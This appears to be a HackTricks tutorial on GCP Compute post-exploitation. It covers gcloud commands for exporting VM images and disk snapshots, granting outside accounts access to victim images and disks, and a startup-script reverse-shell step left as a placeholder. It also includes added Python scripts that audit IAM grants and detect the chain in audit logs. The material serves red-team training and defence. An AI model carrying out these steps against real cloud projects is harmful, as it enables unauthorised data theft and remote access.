GCP - Compute Post Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Compute

For more information about Compute and VPC (Networking) check:

GCP - Compute Enum

Export & Inspect Images locally

This would allow an attacker to access the data contained inside already existing images or create new images of running VMs and access their data without having access to the running VM.

It’s possible to export a VM image to a bucket and then download it and mount it locally with the command:

Export and download VM image
gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# Then download the export from the bucket and mount it locally

To perform this action the attacker might need privileges over the storage bucket and will certainly need privileges over Cloud Build, as it is the service that is asked to perform the export.
Moreover, for this to work the cloudbuild SA and the compute SA need privileged permissions.
The cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com needs:

  • roles/iam.serviceAccountTokenCreator
  • roles/compute.admin
  • roles/iam.serviceAccountUser

And the SA <project-id>-compute@developer.gserviceaccount.com needs:

  • roles/compute.storageAdmin
  • roles/storage.objectAdmin

Export & Inspect Snapshots & Disks locally

It’s not possible to directly export snapshots and disks, but it’s possible to transform a snapshot into a disk, a disk into an image and, following the previous section, export that image to inspect it locally.

Create disk from snapshot and image from disk
# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

Inspect an Image creating a VM

With the goal of accessing the data stored in an image, or inside a running VM from which an attacker has created an image, it is possible to grant an external account access over the image:

Grant access to image and create VM
gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
  --member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
  --role='roles/compute.imageUser'

and then create a new VM from it:

Create VM instance from image
gcloud compute instances create [INSTANCE_NAME] \
  --project=[TARGET_PROJECT_ID] \
  --zone=[ZONE] \
  --image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

If you cannot give your external account access over the image, you could launch a VM using that image in the victim's project and make the metadata execute a reverse shell to access the image by adding the parameter:

Create VM with reverse shell in metadata
    --metadata startup-script='#! /bin/bash
        echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

With the goal of accessing the data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow the previous steps.

Or you could grant an external account access over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):

Grant access to disk
gcloud projects add-iam-policy-binding [PROJECT_ID] \
  --member='user:[USER_EMAIL]' \
  --role='roles/compute.storageAdmin'
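The IAM grants on this page (the export-path roles on the cloudbuild and compute default SAs listed above, and the roles/compute.imageUser and roles/compute.storageAdmin bindings to an outside account) are exactly what a defender should be checking a project's IAM policy for. The script below is an added example, not HackTricks' or Google's code: it reads the JSON that `gcloud projects get-iam-policy PROJECT --format=json` produces (here a constructed sample so it runs offline), reports which export-path roles each default SA actually holds, and lists external principals holding a sharing role. The project id, project number, org domain and all members are constructed placeholders; the default SAs are named by project number, which is why the sample uses one.

```python
"""Audit a GCP project IAM policy for the grants this page relies on.

Two checks over a `gcloud projects get-iam-policy --format=json` document
(constructed sample below so the script runs offline):

1. Which of the broad export-path roles do the Cloud Build SA and the Compute
   default SA hold?  Each one present is a least-privilege finding.
2. Which principals outside the project or org domain hold
   roles/compute.imageUser or roles/compute.storageAdmin?
"""
import json

PROJECT_ID = "example-project"      # constructed
PROJECT_NUMBER = "123456789012"     # constructed; default SAs are named by project number
ORG_DOMAIN = "example.com"          # constructed; users/groups on it count as internal

CLOUDBUILD_SA = f"{PROJECT_NUMBER}@cloudbuild.gserviceaccount.com"
COMPUTE_SA = f"{PROJECT_NUMBER}-compute@developer.gserviceaccount.com"

# Roles the page lists as required for the image export path.
EXPORT_ROLES = {
    CLOUDBUILD_SA: {"roles/iam.serviceAccountTokenCreator",
                    "roles/compute.admin", "roles/iam.serviceAccountUser"},
    COMPUTE_SA: {"roles/compute.storageAdmin", "roles/storage.objectAdmin"},
}
# Roles the page shows being granted to an outside account to reuse images/disks.
SHARING_ROLES = {"roles/compute.imageUser", "roles/compute.storageAdmin"}

SAMPLE_POLICY = json.dumps({  # constructed sample policy
    "bindings": [
        {"role": "roles/compute.admin",
         "members": [f"serviceAccount:{CLOUDBUILD_SA}"]},
        {"role": "roles/iam.serviceAccountUser",
         "members": [f"serviceAccount:{CLOUDBUILD_SA}"]},
        {"role": "roles/storage.objectAdmin",
         "members": [f"serviceAccount:{COMPUTE_SA}"]},
        {"role": "roles/compute.imageUser",
         "members": ["serviceAccount:attacker-sa@other-project.iam.gserviceaccount.com",
                     "user:alice@example.com"]},
        {"role": "roles/compute.storageAdmin",
         "members": ["user:mallory@gmail.com", f"serviceAccount:{COMPUTE_SA}"]},
    ]
})


def roles_by_member(policy_json):
    """Invert the bindings list into {member: set(roles)}."""
    out = {}
    for binding in json.loads(policy_json).get("bindings", []):
        for member in binding.get("members", []):
            out.setdefault(member, set()).add(binding["role"])
    return out


def export_capable_roles(policy_json):
    """{sa: sorted export-path roles that SA actually holds}."""
    held = roles_by_member(policy_json)
    return {sa: sorted(held.get(f"serviceAccount:{sa}", set()) & roles)
            for sa, roles in EXPORT_ROLES.items()}


def is_external(member):
    """True for principals that do not belong to this project or org domain."""
    kind, _, ident = member.partition(":")
    if kind in ("allUsers", "allAuthenticatedUsers"):
        return True
    if kind == "serviceAccount":
        return not (ident.endswith(f"@{PROJECT_ID}.iam.gserviceaccount.com")
                    or ident in (CLOUDBUILD_SA, COMPUTE_SA))
    if kind in ("user", "group"):
        return not ident.endswith(f"@{ORG_DOMAIN}")
    return True  # domain:, deleted:, unknown kinds: surface for review


def external_sharing_grants(policy_json):
    """Sorted (member, role) pairs where an external principal holds a sharing role."""
    held = roles_by_member(policy_json)
    return sorted((member, role) for member, roles in held.items()
                  if is_external(member) for role in roles & SHARING_ROLES)


if __name__ == "__main__":
    for sa, roles in export_capable_roles(SAMPLE_POLICY).items():
        print(f"{sa}: {roles or 'none of the export-path roles'}")
    for member, role in external_sharing_grants(SAMPLE_POLICY):
        print(f"EXTERNAL {member} holds {role}")
```

Replace SAMPLE_POLICY with the real policy file and adjust ORG_DOMAIN; a non-empty result from either function is a binding worth justifying or removing, since the export and cross-project reuse paths on this page depend on precisely these grants.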

Attach the disk to an instance:

Attach disk to instance
gcloud compute instances attach-disk [INSTANCE_NAME] \
  --disk [DISK_NAME] \
  --zone [ZONE]

Mount the disk inside the VM:

  1. SSH into the VM:

    SSH into VM and mount disk
    gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
    
  2. Identify the Disk: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as /dev/sdb, /dev/sdc, etc.

  3. Mount the Disk (format it first only if it is a new, raw disk; a disk being inspected must not be formatted, since that destroys its data):

    • Create a mount point:

      Create mount point and mount
      sudo mkdir -p /mnt/disks/[MOUNT_DIR]
      
    • Mount the disk:

      Mount disk device
      sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
      

If you cannot give an external project access to the snapshot or disk, you might need to perform these actions inside an instance in the same project as the snapshot/disk.
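Every step in the snapshot/disk/image sections above is an Admin Activity event in the project's audit log: a disk created from a snapshot, an image created from a disk, an instance created with a startup-script in its metadata or from an image in another project, and a disk attached to an instance. The script below is an added detection example, not part of HackTricks or of any Google tooling. The log entries are constructed and shaped after the protoPayload fields Compute Engine writes (methodName, authenticationInfo.principalEmail, resourceName, request); the method names and field paths are assumed to match what `gcloud logging read --format=json` returns, so confirm them against your own logs before relying on the rules. Principals, projects and resource names are placeholders.

```python
"""Spot the snapshot -> disk -> image -> VM chain from this page in audit logs.

Input is JSON-lines Admin Activity entries.  Each entry is scored for the chain
stages it evidences, and stages are grouped per principal so that one actor
walking several stages stands out from routine single operations.
"""
import json
from collections import defaultdict

# Google-owned public image projects; booting from these is not a cross-project
# image copy.  Partial list, extend as needed.
PUBLIC_IMAGE_PROJECTS = {"debian-cloud", "ubuntu-os-cloud", "cos-cloud",
                         "centos-cloud", "rhel-cloud", "windows-cloud"}


def _entry(principal, method, resource, request):
    """Build a minimal log entry in the assumed protoPayload shape (constructed)."""
    return {"protoPayload": {"methodName": method,
                             "authenticationInfo": {"principalEmail": principal},
                             "resourceName": resource,
                             "request": request}}


ATTACKER = "attacker@outside.example"   # constructed principal
OPS = "ops@victim.example"              # constructed principal
VICTIM = "projects/victim-proj"         # constructed project path
ZONE = f"{VICTIM}/zones/us-central1-a"

# Constructed sample: five entries are one principal walking the chain on this
# page, two are routine operator activity.  Entries from both projects are
# merged as if they shared one log sink.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    _entry(ATTACKER, "v1.compute.disks.insert", f"{ZONE}/disks/copy-disk",
           {"sourceSnapshot": f"{VICTIM}/global/snapshots/prod-db-snap"}),
    _entry(ATTACKER, "v1.compute.images.insert", f"{VICTIM}/global/images/copy-img",
           {"sourceDisk": f"{ZONE}/disks/copy-disk"}),
    _entry(ATTACKER, "v1.compute.instances.insert", f"{ZONE}/instances/inspect-vm",
           {"metadata": {"items": [{"key": "startup-script", "value": "#! /bin/bash\necho hello"}]},
            "disks": [{"initializeParams": {"sourceImage": f"{VICTIM}/global/images/copy-img"}}]}),
    _entry(ATTACKER, "v1.compute.instances.attachDisk", f"{ZONE}/instances/inspect-vm",
           {"source": f"{ZONE}/disks/prod-db-disk"}),
    _entry(ATTACKER, "v1.compute.instances.insert",
           "projects/outside-proj/zones/us-central1-a/instances/reader",
           {"disks": [{"initializeParams": {"sourceImage": f"{VICTIM}/global/images/copy-img"}}]}),
    _entry(OPS, "v1.compute.instances.insert", f"{ZONE}/instances/web-1",
           {"disks": [{"initializeParams": {"sourceImage": "projects/debian-cloud/global/images/family/debian-12"}}]}),
    _entry(OPS, "v1.compute.instances.attachDisk", f"{ZONE}/instances/web-1",
           {"source": f"{ZONE}/disks/web-1-data"}),
])


def project_of(resource):
    """'projects/<id>/...' -> '<id>', or None for any other shape."""
    parts = resource.split("/")
    return parts[1] if len(parts) > 1 and parts[0] == "projects" else None


def findings_for(entry):
    """Return the chain stages a single log entry evidences (possibly none)."""
    p = entry["protoPayload"]
    method, req, res = p.get("methodName", ""), p.get("request", {}), p.get("resourceName", "")
    out = []
    if method == "v1.compute.disks.insert" and req.get("sourceSnapshot"):
        out.append("disk_from_snapshot")
    if method == "v1.compute.images.insert" and req.get("sourceDisk"):
        out.append("image_from_disk")
    if method == "v1.compute.instances.insert":
        keys = {item.get("key") for item in req.get("metadata", {}).get("items", [])}
        if keys & {"startup-script", "startup-script-url"}:
            out.append("instance_with_startup_script")
        for disk in req.get("disks", []):
            src_proj = project_of(disk.get("initializeParams", {}).get("sourceImage", ""))
            if src_proj and src_proj != project_of(res) and src_proj not in PUBLIC_IMAGE_PROJECTS:
                out.append("instance_from_foreign_image")
    if method == "v1.compute.instances.attachDisk":
        out.append("disk_attached")
    return out


def chain_by_principal(jsonl):
    """Map principalEmail -> ordered list of chain stages seen for that principal."""
    chain = defaultdict(list)
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        entry = json.loads(line)
        who = entry["protoPayload"].get("authenticationInfo", {}).get("principalEmail", "unknown")
        chain[who].extend(findings_for(entry))
    return dict(chain)


def suspicious_principals(jsonl, min_stages=2):
    """Principals that touched at least min_stages distinct stages of the chain."""
    return sorted(who for who, stages in chain_by_principal(jsonl).items()
                  if len(set(stages)) >= min_stages)


if __name__ == "__main__":
    for who, stages in chain_by_principal(SAMPLE_LOG).items():
        print(f"{who}: {stages}")
    print("review:", suspicious_principals(SAMPLE_LOG))
```

A single attachDisk or startup-script instance is normal operator activity, which is why the threshold is on distinct stages per principal rather than on any one event; an instance created from an image that lives in another, non-Google project is the cross-project reuse the imageUser grant above enables and is flagged on its own.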
